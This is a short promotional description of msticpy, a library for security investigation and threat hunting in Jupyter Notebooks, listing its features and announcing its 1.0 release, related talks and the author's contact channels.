msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks.
msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks. Functionality includes:
- querying log data from multiple sources (Azure Sentinel, MS Defender, Splunk, Local CSVs)
- enriching the data with Threat Intelligence, geo-locations and Azure resource data
- extract Indicators of Activity (IoA) (IPs, URLs, etc.) from logs and unpack encoded data
- performing sophisticated analysis such as anomalous session detection and time series decomposition
- visualizing data using interactive timelines, process trees and multi-dimensional Morph Charts
It also includes time-saving notebook tools such as widgets (set query times, item selection, view complex data formats), several GUI tools to help you navigate the interface and configure the notebook environment.
MSTICPy goes 1.0!
Join us at PyCon Online 2021 (14-15 May 2021)
Deep-dive on The Launch Space (20 May 2021)
Check out our one-hour live broadcast on Microsoft Learn TV on May 20 at 1PM PT, where we’ll dive deep into MSTICPy and it’s many uses! More details and save-the-date at https://aka.ms/thelaunchspacemsticpy. See you then!
I’d love to hear any feedback, questions, or help out if you are trying any of these projects or examples.
You can reach me on Twitter (@as_w) or Aaron W#0101 on the Microsoft Open Source Discord (aka.ms/open-source-discord).